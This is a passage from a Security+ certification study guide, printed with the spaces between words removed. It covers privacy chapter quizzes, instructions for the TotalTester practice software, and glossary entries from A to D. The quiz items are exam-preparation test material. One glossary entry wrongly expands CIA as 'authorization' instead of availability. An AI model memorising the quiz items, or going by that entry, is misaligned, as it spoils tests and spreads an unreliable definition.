Describeissuesassociatedwithtechnologyandprivacy
Adirectrelationshipexistsbetweeninformationsecurityandprivacy—onecannothaveprivacywithoutsecurity.
Privacy-enhancingtechnologies(PETs)areusedinthetechnologicalbattletopreserveanonymityandprivacy.
Explaintheconceptofpersonallyidentifiableinformation(PII)
SpecificconstituentelementsofPIIneedtobeprotected.
CorporateresponsibilitiesassociatedwithPIIincludetheneedtoprotectPIIappropriatelywheninstorage,use,ortransmission.
Craftaprivacypolicyforonlinerecords
Policiesdrivecorporateactions,andprivacypoliciesarerequiredbyseveralstatutesandareessentialtoensurecompliancewiththemyriadofmandatedactions.
Recognizeweb-relatedprivacyissues
CookiesrepresentausefultooltomaintainstatewhensurfingtheWeb,butifusedincorrectly,theycanrepresentasecurityandprivacyrisk.
KeyTermschoice(719)consent(719)cookiecutters(730)cookies(732)dataprotection(728)DisposalRule(725)FreedomofInformationAct(FOIA)(720)HealthInsurancePortabilityandAccountabilityAct(HIPAA)(723)identitytheft(725)notice(719)NoticeofPrivacyPractices(NPP)(723)opt-in(727)opt-out(727)PersonalInformationProtectionandElectronicDataAct(PIPEDA)
(729)personallyidentifiableinformation(PII)(717)privacy(716)PrivacyActof1974(720)privacy-enhancingtechnology(PET)(730)privacyimpactassessment(PIA)(731)privacypolicy(730)ProtectedHealthInformation(PHI)(723)redflag(726)redflagrules(726)SafeHarbor(729)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.
Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.IntheUnitedStates,thestandardmethodologyforconsumerswithrespecttoprivacyisto_______________,whereasintheEUitisto______________.
2._______________istherighttocontrolinformationaboutoneself.3.TheFTCmandatesfirms’useof_______________proceduresto
identifyinstanceswhereadditionalprivacymeasuresarewarranted.
4.DifferencesbetweenprivacyrulesandregulationsintheUnitedStatesandtheEUareresolvedthrough_______________conventions.
5.Datathatcanbeusedtoidentifyaspecificindividualisreferredtoas_______________.
6.Programsusedtocontroltheuseof___________whenwebbrowsingarereferredtoas_________.
7.ThemajorU.S.privacystatutesare____________and_______________.
8.MedicalinformationintheUnitedStatesisprotectedviathe_______________.
9.Manyprivacyregulationshavespecifiedthatfirmsprovideanannual_______________tocustomers.
10.Toevaluatetheprivacyrisksinafirm,a(n)_______________canbeperformed.
Multiple-ChoiceQuiz1.HIPAArequiresthefollowingcontrolsformedicalrecords:
A.Encryptionofalldata
B.Technicalsafeguards
C.Physicalcontrols
D.Administrative,technical,andphysicalcontrols
2.WhichofthefollowingisnotPII?A.Customername
B.CustomerIDnumber
C.Customersocialsecuritynumberortaxpayeridentificationnumber
D.Customerbirthdate
3.Aprivacyimpactassessment:A.Determinesthegapbetweenacompany’sprivacypracticesand
requiredactions
B.Determinesthedamagecausedbyabreachofprivacy
C.Determineswhatcompaniesholdinformationonaspecificperson
D.IsacorporateproceduretosafeguardPII
4.WhichofthefollowingshouldtriggeraresponseundertheRedFlagRule?
A.Allcreditrequestsforpeopleunder25orover75
B.Anynewcustomercreditrequest,exceptfornamechangesduetomarriage
C.Requestforcreditfromacustomerwhohasahistoryoflatepaymentsandpoorcredit
D.Requestforcreditfromacustomerwithacreditfreezeonhiscreditreportingrecord
5.WhichofthefollowingisanacceptablePIIdisposalprocedure?A.Shredding
B.Burning
C.Electronicdestructionpermilitarydatadestructionstandards
D.Alloftheabove
6.SafeHarborprinciplesinclude:A.Notice,Choice,PrivacyPolicy,DataRestrictions
B.Notice,Choice,Security,Privacy,Integrity
C.Notice,PhysicalSafeguards,Choice,Security,DataIntegrity
D.Notice,Choice,OnwardTransfer,Enforcement,Security,DataIntegrity
7.Europeanprivacylawsarebuiltupon:A.EUDataProtectionDirective
B.PersonalInformationProtectionandElectronicDataAct(PIPEDA)
C.SafeHarborprinciples
D.Commonlawpractices
8.IntheUnitedStates,companyresponsestodatadisclosuresofPIIareregulatedby:
A.Federallaw,thePrivacyAct
B.Aseriesofstatestatutes
C.Contractualagreementswithbanksandcreditcardprocessors
D.TheGramm-Leach-BlileyAct(GLBA)
9.Theprimaryfactor(s)behinddata-sharingcompliancebetweenU.S.andEuropeancompaniesis/are?
A.SafeHarborProvision
B.Europeandataprivacylaws
C.U.S.FTCenforcementactions
D.Alloftheabove
10.Privacyisdefinedas:A.One’sabilitytocontrolinformationabouthimselforherself
B.Beingabletokeepyourinformationsecret
C.Makingdata-sharingillegalwithoutconsumerconsent
D.SomethingthatisoutmodedintheInternetage
EssayQuiz1.Privacyandtechnologyoftenclash,especiallywhentechnology
allowsdatacollectionthatcanhavesecondaryuses.Inthecaseofautomotivetechnology,blackboxestocollectoperationaldataarebeinginstalledinnewcarsintheUnitedStates.Whataretheprivacyimplications,andwhatprotectionsexist?
2.PrivacypoliciesarefoundallovertheWeb.Pickthreewebsiteswithprivacypoliciesandcompareandcontrastthem.Whatdotheyincludeandwhatismissing?
LabProject
•LabProject25.1
Privacy-enhancingtechnologiescandomuchtoprotectauser’sinformationand/ormaintainanonymitywhenusingtheWeb.ResearchonionroutingandtheTorproject.Whatdothesethingsdo?Howdotheywork?
appendixA CompTIASecurity+ExamObjectives:
SY0-401
appendixB AbouttheDownload
Thise-bookcomescompletewithTotalTestercustomizablepracticeexamsoftware.
SystemRequirementsTheTotalTestersoftwarerequiresWindowsXPorhigherand30MB
ofharddiskspaceforfullinstallation,inadditiontoacurrentorpriormajorreleaseofChrome,Firefox,InternetExplorer,orSafari.Torun,thescreenresolutionmustbesetto1024×768orhigher.
DownloadingTotalTesterPremiumPracticeExamSoftware
TodownloadtheTotalTestersoftware,simplyclickthelinkbelowandfollowthedirectionsforfreeonlineregistration.
http://www.totalsem.com/0071836012dl
TotalTesterPremiumPracticeExamSoftwareTotalTesterprovidesyouwithasimulationoftheactualexam.You
canalsocreatecustomexamsfromselectedcertificationobjectivesor
chapters.Youcanfurthercustomizethenumberofquestionsandtimeallowed.
TheexamscanbetakenineitherPracticeModeorExamMode.PracticeModeprovidesanassistancewindowwithhints,referencestothebook,explanationsofthecorrectandincorrectanswers,andtheoptiontocheckyouranswerasyoutakethetest.ExamModeprovidesasimulationoftheactualexam.Thenumberofquestions,thetypesofquestions,andthetimeallowedareintendedtobeanaccuraterepresentationoftheexamenvironment.BothPracticeModeandExamModeprovideanoverallgradeandagradebrokendownbycertificationobjective.
NOTE:TotalTesterdoesnotprovidesimulationsoftheexam’sperformance-basedquestiontype.Forfurtherdiscussiononthisquestiontype,pleaseseethebook’sIntroduction.
Totakeatest,launchTotalTesterandselecttheexamsuitefromtheInstalledQuestionPackslist.YoucanthenselectPracticeMode,ExamMode,orCustomMode.Aftermakingyourselection,clickStartExamtobegin.
InstallingandRunningTotalTester
Onceyou’vedownloadedtheTotalTestersoftware,double-clicktheLaunch.exeicon.FromthemainscreenyoumayinstallTotalTesterbyclickingtheInstallTotalTesterPracticeExamslink.ThiswillbegintheinstallationprocessandplaceanicononyourdesktopandinyourStartmenu.TorunTotalTester,navigatetoStart|(All)Programs|TotalSeminars,ordouble-clicktheicononyourdesktop.
TouninstalltheTotalTestersoftware,gotoStart|Settings|ControlPanel|Add/RemovePrograms(XP)orProgramsAndFeatures(Vista/7/8),andthenselecttheTotalTesterprogram.SelectRemoveandWindowswillcompletelyuninstallthesoftware.
TechnicalSupportTechnicalSupportinformationisprovidedinthefollowingsectionsby
feature.
TotalSeminarsTechnicalSupport
ForquestionsregardingtheTotalTestersoftware,visitwww.totalsem.comore-mail[emailprotected].
McGraw-HillEducationContentSupport
Forquestionsregardingbookcontent,e-mail[emailprotected].ForcustomersoutsidetheUnitedStates,e-mail[emailprotected].
mailto:[emailprotected]
mailto:[emailprotected]
mailto:[emailprotected]
GLOSSARY
*-propertyPronounced“starproperty,”thisaspectoftheBell–LaPadulasecuritymodeliscommonlyreferredtoasthe“no-write-down”rulebecauseitdoesn’tallowausertowritetoafilewithalowersecurityclassification,thuspreservingconfidentiality.
3DESTripleDESencryption—threeroundsofDESencryptionusedtoimprovesecurity.
802.11SeeIEEE802.11.
802.1XSeeIEEE802.1X.
AAASeeauthentication,authorization,andaccounting.
acceptableusepolicy(AUP)Apolicythatcommunicatestouserswhatspecificusesofcomputerresourcesarepermitted.
accessAsubject’sabilitytoperformspecificoperationsonanobject,suchasafile.Typicalaccesslevelsincluderead,write,execute,anddelete.
accesscontrollist(ACL)Alistassociatedwithanobject(suchasafile)thatidentifieswhatlevelofaccesseachsubject(suchasauser)has—whattheycandototheobject(suchasread,write,orexecute).
accesscontrolsMechanismsormethodsusedtodeterminewhataccess
permissionssubjects(suchasusers)haveforspecificobjects(suchasfiles).
accesspointShorthandforwirelessaccesspoint,thedevicethatallowsdevicestoconnecttoawirelessnetwork.
accesstokensAtokendeviceusedforaccesscontrol,anexampleofsomethingyouhave.
ActiveDirectoryThedirectoryserviceportionoftheWindowsoperatingsystemthatstoresinformationaboutnetwork-basedentities(suchasapplications,files,printers,andpeople)andprovidesastructured,consistentwaytoname,describe,locate,access,andmanagetheseresources.
ActiveServerPages(ASP)Microsoft’sserver-sidescripttechnologyfordynamicallygeneratedwebpages.
ActiveXAMicrosofttechnologythatfacilitatesrichInternetapplications,andthereforeextendsandenhancesthefunctionalityofMicrosoftInternetExplorer.LikeJava,ActiveXenablesthedevelopmentofinteractivecontent.WhenanActiveX-awarebrowserencountersawebpagethatincludesanunsupportedfeature,itcanautomaticallyinstalltheappropriateapplicationsothefeaturecanbeused.
AddressResolutionProtocol(ARP)AprotocolintheTCP/IPsuitespecificationusedtomapanIPaddresstoaMediaAccessControl(MAC)address.
AdvancedEncryptionStandard(AES)ThecurrentU.S.governmentstandardforsymmetricencryption,widelyusedinallsectors.
AdvancedEncryptionStandard256-bit(AES256)AnimplementationofAESusinga256-bitkey.
advancedpersistentthreat(APT)Atypeofadvancedthreatwheretheactorsdesirelong-termpersistenceinasystemovershort-termgain.
adwareAdvertising-supportedsoftwarethatautomaticallyplays,displays,ordownloadsadvertisementsafterthesoftwareisinstalledorwhiletheapplicationisbeingused.
agilemodelAsoftwaredevelopmentmodebuiltaroundtheideaofmanysmalliterationsthatcontinuallyyielda“finished”productatthecompletionofeachiteration.
airgapTheforcedseparationofnetworks,resultinginanairgapbetweensystems.Communicationsacrossanairgaprequireamanualefforttomovedatafromonenetworktoanotherasnonetworkconnectionexistsbetweenthetwonetworks.
algorithmAstep-by-stepprocedure—typicallyanestablishedcomputationforsolvingaproblemwithinasetnumberofsteps.
annualizedlossexpectancy(ALE)Howmuchaneventisexpectedtocostthebusinessperyear,giventhedollarcostofthelossandhowoftenitislikelytooccur.ALE=singlelossexpectancy×annualizedrateofoccurrence.
annualizedrateofoccurrence(ARO)Thefrequencywithwhichaneventisexpectedtooccuronanannualizedbasis.
anomalySomethingthatdoesnotfitintoanexpectedpattern.
antispamTechnologyusedtocombatunsolicitedjunke-mail,orspam.
antivirus(AV)Technologyemployedtoscreenforandblocktheexecutionofvirusesandothermalware.
applicationAprogramorgroupofprogramsdesignedtoprovide
specificuserfunctions,suchasawordprocessororwebserver.
applicationhardeningThestepstakentohardenanapplication,mitigatingvulnerabilitiesandreducingtheexploitablesurface.
applicationprogramminginterface(API)Asetofinstructionsastohowtointerfacewithacomputerprogramsothatdeveloperscanaccessdefinedinterfacesinaprogram.
applicationserviceprovider(ASP)AcompanythatoffersentitiesaccessovertheInternettoapplicationsandservices.
applicationvulnerabilityscannerTechnologyusedtoscanapplicationsforpotentialvulnerabilitiesandweaknesses.
ARPSeeAddressResolutionProtocol.
ARPbackscatterTheuseofARPscanningagainstagatewaydevicetodetectthepresenceofadevicebehindthegatewayorrouter.
ARPpoisoningAnattackcharacterizedbychangingentriesinanARPtabletocausemisdirectedtraffic.
assetResourcesandinformationanorganizationneedstoconductitsbusiness.
asymmetricencryptionAlsocalledpublickeycryptography,thisisasystemforencryptingdatathatusestwomathematicallyderivedkeystoencryptanddecryptamessage—apublickey,availabletoeveryone,andaprivatekey,availableonlytotheownerofthekey.
attribute-basedaccesscontrol(ABAC)Anaccesscontrolmodelbuiltaroundasetofrulesbuiltuponspecificattributes.
auditabilityThepropertyofanitemthatmakesitavailablefor
verificationuponinspection.
audittrailAsetofrecordsorevents,generallyorganizedchronologically,thatrecordswhatactivityhasoccurredonasystem.Theserecords(oftencomputerfiles)areoftenusedinanattempttore-createwhattookplacewhenasecurityincidentoccurred,andtheycanalsobeusedtodetectpossibleintruders.
auditingActionsorprocessesusedtoverifytheassignedprivilegesandrightsofauser,oranycapabilitiesusedtocreateandmaintainarecordshowingwhoaccessedaparticularsystemandwhatactionstheyperformed.
authenticationTheprocessbywhichasubject’s(suchasauser’s)identityisverified.
authentication,authorization,andaccounting(AAA)Threecommonfunctionsperformeduponsystemlogin.Authenticationandauthorizationalmostalwaysoccur,withaccountingbeingsomewhatlesscommon.
AuthenticationHeader(AH)AportionoftheIPsecsecurityprotocolthatprovidesauthenticationservicesandreplay-detectionability.AHcanbeusedeitherbyitselforwithEncapsulatingSecurityPayload(ESP).RefertoRFC2402.
authenticationserver(AS)Aserverusedtoperformauthenticationtasks.
AuthenticodeMicrosoftcode-signingtechnologyusedtoprovideintegrityandattributiononsoftware.
authorityrevocationlist(ARL)Alistofauthoritiesthathavehadtheircertificatesrevoked.
authorizationThefunctionofdeterminingwhatispermittedforan
authorizeduser.
autoplayTechnologyemployedtolaunchappropriateapplicationsandplayordisplaycontentonremovablemediawhenthemediaismounted.
availabilityPartofthe“CIA”ofsecurity.Availabilityappliestohardware,software,anddata,specificallymeaningthateachoftheseshouldbepresentandaccessiblewhenthesubject(theuser)wantstoaccessorusethem.
backdoorAhiddenmethodusedtogainaccesstoacomputersystem,network,orapplication.Oftenusedbysoftwaredeveloperstoensureunrestrictedaccesstothesystemstheycreate.Synonymouswithtrapdoor.
backoutplanningThepartofaconfigurationchangeplanwherestepsaredevisedtoundoachange,evenwhennotcomplete,torestoreasystembacktothepreviousoperatingcondition.
backupReferstocopyingandstoringdatainasecondarylocation,separatefromtheoriginal,topreservethedataintheeventthattheoriginalislost,corrupted,ordestroyed.
baselineAsystemorsoftwareasitisbuiltandfunctioningataspecificpointintime.Servesasafoundationforcomparisonormeasurement,providingthenecessaryvisibilitytocontrolchange.
BasicInput/OutputSystem(BIOS)Afirmwareelementofacomputersystemthatprovidestheinterfacebetweenhardwareandsystemsoftwarewithrespecttodevicesandperipherals.BIOSisbeingreplacedbyExtensibleFirmwareInterface(EFI),amorecomplexandcapablesystem.
beaconframesAseriesofframesusedinWiFi(802.11)toestablishthepresenceofawirelessnetworkdevice.
Bell–LaPadulasecuritymodelAcomputersecuritymodelbuiltaround
thepropertyofconfidentialityandcharacterizedbyno-read-upandno-write-downrules.
bestevidenceruleAlegalprinciplethatsupportsatruecopyasequivalenttotheoriginal.
BGPSeeBorderGatewayProtocol.
BibasecuritymodelAninformationsecuritymodelbuiltaroundthepropertyofintegrityandcharacterizedbyno-write-upandno-read-downrules.
biometricsUsedtoverifyanindividual’sidentitytothesystemornetworkusingsomethinguniqueabouttheindividual,suchasafingerprint,fortheverificationprocess.Examplesincludefingerprints,retinalscans,handandfacialgeometry,andvoiceanalysis.
BIOSSeeBasicInput/OutputSystem.
birthdayattackAformofattackinwhichtheattackneedstomatchnotaspecificitembutjustoneofasetofitems.
blacklistingThetermusedtodescribetheexclusionofitemsbasedontheirbeingonalist(blacklist).
black-boxtestingAformoftestingwherethetesterhasnoknowledgeoftheinnerworkingsofamechanism.
blockcipherAcipherthatoperatesonblocksofdata.
BlowfishAfreeimplementationofasymmetricblockcipherdevelopedbyBruceSchneierasadrop-inreplacementforDESandIDEA.Ithasavariablebit-lengthschemefrom32to448bits,resultinginvaryinglevelsofsecurity.
bluebuggingTheuseofaBluetooth-enableddevicetoeavesdroponanotherperson’sconversationusingthatperson’sBluetoothphoneasatransmitter.ThebluebugapplicationsilentlycausesaBluetoothdevicetomakeaphonecalltoanotherdevice,causingthephonetoactasatransmitterandallowingthelistenertoeavesdroponthevictim’sconversationinrealtime.
bluejackingThesendingofunsolicitedmessagesoverBluetoothtoBluetooth-enableddevicessuchasmobilephones,tablets,orlaptopcomputers.
bluesnarfingTheunauthorizedaccessofinformationfromaBluetooth-enableddevicethroughaBluetoothconnection,oftenbetweenphones,desktops,laptops,andtablets.
BluetoothAnRFtechnologyusedforshort-rangenetworking,
BorderGatewayProtocol(BGP)TheinterdomainroutingprotocolimplementedinInternetProtocol(IP)networkstoenableroutingbetweenautonomoussystems.
botnetAtermforacollectionofsoftwarerobots,orbots,thatrunsautonomouslyandautomaticallyandcommonlyinvisiblyinthebackground.Thetermismostoftenassociatedwithmalicioussoftware,butitcanalsorefertothenetworkofcomputersusingdistributedcomputingsoftware.
Brewer-NashsecuritymodelAsecuritymodeldefinedbycontrollingreadandwriteaccessbasedonconflictofinterestrules.ThismodelisalsoknownastheChinese-Wallmodel,aftertheconceptofseparatinggroupsthroughtheuseofanimpenetrablewall.
bridgeAnetworkdevicethatseparatestrafficintoseparatecollisiondomainsatthedatalayeroftheOSImodel.
bringyourowndevice(BYOD)Atermusedtodescribeanenvironmentwhereusersbringtheirpersonallyowneddevicesintotheenterpriseandintegratethemintobusinesssystems.
bufferoverflowAspecifictypeofsoftwarecodingerrorthatenablesuserinputtooverflowtheallocatedstorageareaandcorruptarunningprogram.
BureauofIndustryandSecurity(BIS)IntheU.S.DepartmentofCommerce,thedepartmentresponsibleforexportadministrationregulationsthatcoverencryptiontechnologyintheUnitedStates.
bustopologyAnetworklayoutinwhichacommonline(thebus)connectsdevices.
businesscontinuityplan(BCP)Theplansabusinessdevelopstocontinuecriticaloperationsintheeventofamajordisruption.
businessimpactanalysis(BIA)Ananalysisoftheimpacttothebusinessofaspecificevent.
businesspartnershipagreement(BPA)Awrittenagreementdefiningthetermsandconditionsofabusinesspartnership.
BYODSeebringyourowndevice.
CAcertificateAdigitalcertificateidentifyingthekeysusedbyacertificateauthority.
cacheThetemporarystorageofinformationbeforeuse,typicallyusedtospeedupsystems.InanInternetcontext,referstothestorageofcommonlyaccessedwebpages,graphicfiles,andothercontentlocallyonauser’sPCorawebserver.Thecachehelpstominimizedownloadtimeandpreservebandwidthforfrequentlyaccessedwebsites,andithelpsreducetheloadonawebserver.
CapabilityMaturityModel(CMM)Astructuredmethodologyhelpingorganizationsimprovethematurityoftheirsoftwareprocessesbyprovidinganevolutionarypathfromadhocprocessestodisciplinedsoftwaremanagementprocesses.DevelopedatCarnegieMellonUniversity’sSoftwareEngineeringInstitute(SEI).
CapabilityMaturityModelIntegration(CMMI)Atrademarkedprocessimprovementmethodologyforsoftwareengineering.DevelopedatCarnegieMellonUniversity’sSoftwareEngineeringInstitute(SEI).
captiveportalAwebsiteusedtovalidatecredentialsbeforeallowingaccesstoanetworkconnection.
centralizedmanagementAtypeofprivilegemanagementthatbringstheauthorityandresponsibilityformanagingandmaintainingrightsandprivilegesintoasinglegroup,location,orarea.
CERTSeeComputerEmergencyResponseTeam.
certificateAcryptographicallysignedobjectthatcontainsanidentityandapublickeyassociatedwiththisidentity.Thecertificatecanbeusedtoestablishidentity,analogoustoanotarizedwrittendocument.
certificateauthority(CA)Anentityresponsibleforissuingandrevokingcertificates.CAsaretypicallynotassociatedwiththecompanyrequiringthecertificate,althoughtheyexistforinternalcompanyuseaswell(suchasMicrosoft).Thistermalsoappliestoserversoftwarethatprovidestheseservices.Thetermcertificateauthorityisusedinterchangeablywithcertificationauthority.
CertificateEnrollmentProtocol(CEP)OriginallydevelopedbyVeriSignforCiscoSystemstosupportcertificateissuance,distribution,andrevocationusingexistingtechnologies.
certificatepathAnenumerationofthechainoftrustfromonecertificate
toanothertracingbacktoatrustedroot.
certificaterepositoryAstoragelocationforcertificatesonasystemsothattheycanbereused.
certificaterevocationlist(CRL)Adigitallysignedobjectthatlistsallofthecurrentbutrevokedcertificatesissuedbyagivencertificationauthority.Thisallowsuserstoverifywhetheracertificateiscurrentlyvalidevenifithasnotexpired.ACRLisanalogoustoalistofstolenchargecardnumbersthatallowsstorestorejectbadcreditcards.
certificateserverAserver—partofaPKIsystem—thathandlesdigitalcertificates.
certificatesigningrequest(CSR)Astructuredmessagesenttoacertificateauthorityrequestingadigitalcertificate.
certificationpracticesstatement(CPS)AdocumentthatdescribesthepolicyforissuingdigitalcertificatesfromaCA.
chainofcustodyRulesfordocumenting,handling,andsafeguardingevidencetoensurenounanticipatedchangesaremadetotheevidence.
Challenge-HandshakeAuthenticationProtocol(CHAP)Usedtoprovideauthenticationacrosspoint-to-pointlinksusingthePoint-to-PointProtocol(PPP).
change(configuration)managementAstandardmethodologyforperformingandrecordingchangesduringsoftwaredevelopmentandoperation.
changecontrolboard(CCB)Abodythatoverseesthechangemanagementprocessandenablesmanagementtooverseeandcoordinateprojects.
CHAPSeeChallenge-HandshakeAuthenticationProtocol.
CIAofsecurityReferstoconfidentiality,integrity,andauthorization,thebasicfunctionsofanysecuritysystem.
cipherAcryptographicsystemthatacceptsplaintextinputandthenoutputsciphertextaccordingtoitsinternalalgorithmandkey.
ciphertextUsedtodenotetheoutputofanencryptionalgorithm.Ciphertextistheencrypteddata.
CIRTSeeComputerEmergencyResponseTeam.
Clark-WilsonsecuritymodelAsecuritymodelthatusestransactionsandadifferentiationofconstraineddataitems(CDI)andunconstraineddataitems(UDI).
closedcircuittelevision(CCTV)Aprivatetelevisionsystemusuallyhardwiredinsecurityapplicationstorecordvisualinformation.
cloudcomputingTheautomaticprovisioningofon-demandcomputationalresourcesacrossanetwork.
coaxialcableAnetworkcablethatconsistsofasolidcentercoreconductorandaphysicalspacertotheouterconductorwhichiswrappedaroundit.Commonlyusedinvideosystems.
codeinjectionAnattackwhereunauthorizedexecutablecodeisinjectedviaaninterfaceinanattempttogetittorunonasystem.
codesigningTheapplicationofdigitalsignaturetechnologytosoftwareforpurposesofintegrityandauthenticationcontrol.
coldsiteAninexpensiveformofbackupsitethatdoesnotincludeacurrentsetofdataatalltimes.Acoldsitetakeslongertogetyour
operationalsystembackup,butitisconsiderablylessexpensivethanawarmorhotsite.
collisionattackAnattackonahashfunctioninwhichaspecificinputisgeneratedtoproduceahashfunctionoutputthatmatchesanotherinput.
collisiondomainAnareaofsharedtrafficinanetworkwherepacketsfromdifferentconversationscancollide.
collisionsUsedintheanalysisofhashingcryptography,itisthepropertybywhichanalgorithmwillproducethesamehashfromtwodifferentsetsofdata.
CommonAccessCard(CAC)Asmartcardusedtoaccessfederalcomputersystems,andtoalsoactasanIDcard.
CommonGatewayInterface(CGI)Anolder,outdatedtechnologyusedforserver-sideexecutionofprogramsonwebsites.
CommonVulnerabilitiesandExposures(CVE)Astructuredlanguage(XML)schemausedtodescribeknownvulnerabilitiesinsoftware.
CommonWeaknessEnumeration(CWE)Astructuredlanguage(XML)schemausedtodescribeknownweaknesspatternsinsoftwarethatcanresultinvulnerabilities.
completemediationTheprinciplethatprotectionmechanismsshouldcovereveryaccesstoeveryobject.
ComputerEmergencyResponseTeam(CERT)AlsoknownasaComputerIncidentResponseTeam(CIRT),thisgroupisresponsibleforinvestigatingandrespondingtosecuritybreaches,viruses,andotherpotentiallycatastrophicincidents.
computersecurityIngeneralterms,themethods,techniques,andtools
usedtoensurethatacomputersystemissecure.
computersoftwareconfigurationitemSeeconfigurationitem.
concentratorAdeviceusedtomanagemultiplesimilarnetworkingoperations,suchasprovideaVPNendpointformultipleVPNs.
confidentialityPartoftheCIAofsecurity.Referstothesecurityprinciplethatstatesthatinformationshouldnotbedisclosedtounauthorizedindividuals.
configurationauditingTheprocessofverifyingthatconfigurationitemsarebuiltandmaintainedaccordingtorequirements,standards,orcontractualagreements.
configurationcontrolTheprocessofcontrollingchangestoitemsthathavebeenbaselined.
configurationidentificationTheprocessofidentifyingwhichassetsneedtobemanagedandcontrolled.
configurationitemDataorsoftware(orotherasset)thatisidentifiedandmanagedaspartofthesoftwarechangemanagementprocess.Alsoknownascomputersoftwareconfigurationitem.
configurationstatusaccountingProceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline.
confusionAprinciplethat,whenemployed,makeseachcharacterofciphertextdependentonseveralpartsofthekey.
contentprotectionTheprotectionoftheheaderanddataportionofauserdatagram.
contextprotectionTheprotectionoftheheaderofauserdatagram.
contingencyplanning(CP)Theactofcreatingprocessesandproceduresthatareusedunderspecialconditions(contingencies).
ContinuityofOperationsPlanning(COOP)Thecreationofplansrelatedtocontinuingessentialbusinessoperations.
controlAmeasuretakentodetect,prevent,ormitigatetheriskassociatedwithathreat.
ControllerAreaNetworkAbusstandardforuseinvehiclestoconnectmicrocontrollers.
cookieInformationstoredonauser’scomputerbyawebservertomaintainthestateoftheconnectiontothewebserver.Usedprimarilysopreferencesorpreviouslyusedinformationcanberecalledonfuturerequeststotheserver.
COOPSeeContinuityofOperationsPlanning.
CounterModewithCipherBlockChainingMessageAuthenticationCodeProtocol(CCMP)AnenhanceddatacryptographicencapsulationmechanismbasedonthecountermodewithCBC-MACfromAESanddesignedforuseoverwirelessLANs.
countermeasureSeecontrol.
crackingAtermusedbysometorefertomalicioushacking,inwhichanindividualattemptstogainunauthorizedaccesstocomputersystemsornetworks.Seealsohacking.
criticalinfrastructureInfrastructurewhoselossorimpairmentwouldhavesevererepercussionsonsociety.
CRCSeecyclicredundancycheck.
CRLSeecertificaterevocationlist.
cross-certificationcertificateAcertificateusedtoestablishtrustbetweenseparatePKI’s.
crossovererrorrate(CER)Thepointatwhichthefalserejectionrateandfalseacceptancerateareequalinasystem.
cross-siterequestforgery(CSRForXSRF)Amethodofattackingasystembysendingmaliciousinputtothesystemandrelyingupontheparsersandexecutionelementstoperformtherequestedactions,thusinstantiatingtheattack.XSRFexploitsthetrustasitehasintheuser’sbrowser.
cross-sitescripting(XSS)Amethodofattackingasystembysendingscriptcommandstothesysteminputandrelyingupontheparsersandexecutionelementstoperformtherequestedscriptedactions,thusinstantiatingtheattack.XSSexploitsthetrustauserhasforthesite.
cryptanalysisTheprocessofattemptingtobreakacryptographicsystem.
cryptographicallyrandomArandomnumberthatisderivedfromanondeterministicsource,thusknowingonerandomnumberprovidesnoinsightintothenext.
cryptographyTheartofsecretwritingthatenablesanindividualtohidethecontentsofamessageorfilefromallbuttheintendedrecipient.
CyberObservableeXpression(CybOX)Astructured(XML)languagefordescribingcybersecurityeventsatagranularlevel.
cyclicredundancycheck(CRC)Anerrordetectiontechniquethatusesaseriesoftwo8-bitblockcheckcharacterstorepresentanentireblockofdata.Theseblockcheckcharactersareincorporatedintothetransmission
frameandthencheckedatthereceivingend.
DACSeediscretionaryaccesscontrol.
dataaggregationAmethodologyofcollectinginformationthroughtheaggregationofseparatepiecesandanalyzingtheeffectoftheircollection.
DataEncryptionStandard(DES)Aprivatekeyencryptionalgorithmadoptedbythegovernmentasastandardfortheprotectionofsensitivebutunclassifiedinformation.CommonlyusedinTripleDES(3DES),wherethreeroundsareappliedtoprovidegreatersecurity.
DataExecutionPrevention(DEP)AsecurityfeatureofanOSthatcanbedrivenbysoftware,hardware,orboth,designedtopreventtheexecutionofcodefromblocksofdatainmemory.
datalossprevention(DLP)Technology,processes,andproceduresdesignedtodetectwhenunauthorizedremovalofdatafromasystemoccurs.DLPistypicallyactive,preventingthelossofdata,eitherbyblockingthetransferordroppingtheconnection.
datagramApacketofdatathatcanbetransmittedoverapacket-switchedsysteminaconnectionlessmode.
decisiontreeAdatastructureinwhicheachelementinthestructureisattachedtooneormorestructuresdirectlybeneathit.
defaultdenyTheuseofanoverarchingrulethatifnotexplicitlypermitted,permissionwillbedenied.
deltabackupAtypeofbackupthatpreservesonlytheblocksthathavechangedsincethelastfullbackup.
demilitarizedzone(DMZ)Anetworksegmentthatexistsinasemi-protectedzonebetweentheInternetandtheinner,securetrustednetwork.
denial-of-service(DoS)attackAnattackinwhichactionsaretakentodepriveauthorizedindividualsfromaccessingasystem,itsresources,thedataitstoresorprocesses,orthenetworktowhichitisconnected.
DESSeeDataEncryptionStandard.
DHCPSeeDynamicHostConfigurationProtocol.
DiameterThebaseprotocolthatisintendedtoprovideanauthentication,authorization,andaccounting(AAA)frameworkforapplicationssuchasnetworkaccessorIPmobility.DiameterisadraftIETFproposal.
differentialbackupAtypeofbackupthatpreservesonlychangessincethelastfullbackup.
differentialcryptanalysisAformofcryptanalysisthatusesdifferentinputstostudyhowoutputschangeinastructuredmanner.
Diffie-HellmanAcryptographicmethodofestablishingasharedkeyoveraninsecuremediuminasecurefashion.
Diffie-HellmanEphemeral(DHE)Acryptographicmethodofestablishingasharedkeyoveraninsecuremediuminasecurefashionusingatemporarykeytoenableperfectforwardsecrecy(PFS).
diffusionAprinciplethatthestatisticalanalysisofplaintextandciphertextresultsinaformofdispersionrenderingonestructurallyindependentoftheother.Inplainterms,achangeinonecharacterofplaintextshouldresultinmultiplechangesintheciphertextinamannerthatchangesinciphertextdonotrevealinformationastothestructureoftheplaintext.
digitalcertificateSeecertificate.
digitalrightsmanagementThecontrolofuseractivitiesassociatedwith
adigitalobjectviatechnologicalmeans.
digitalsandboxTheisolationofaprogramanditssupportingelementsfromcommonoperatingsystemfunctions.
digitalsignatureAcryptography-basedartifactthatisakeycomponentofapublickeyinfrastructure(PKI)implementation.Adigitalsignaturecanbeusedtoproveidentitybecauseitiscreatedwiththeprivatekeyportionofapublic/privatekeypair.Arecipientcandecryptthesignatureand,bydoingso,receivetheassurancethatthedatamusthavecomefromthesenderandthatthedatahasnotchanged.
digitalsignaturealgorithm(DSA)AU.S.governmentstandardforimplementingdigitalsignatures.
direct-sequencespreadspectrum(DSSS)Amethodofdistributingacommunicationovermultiplefrequenciestoavoidinterferenceanddetection.
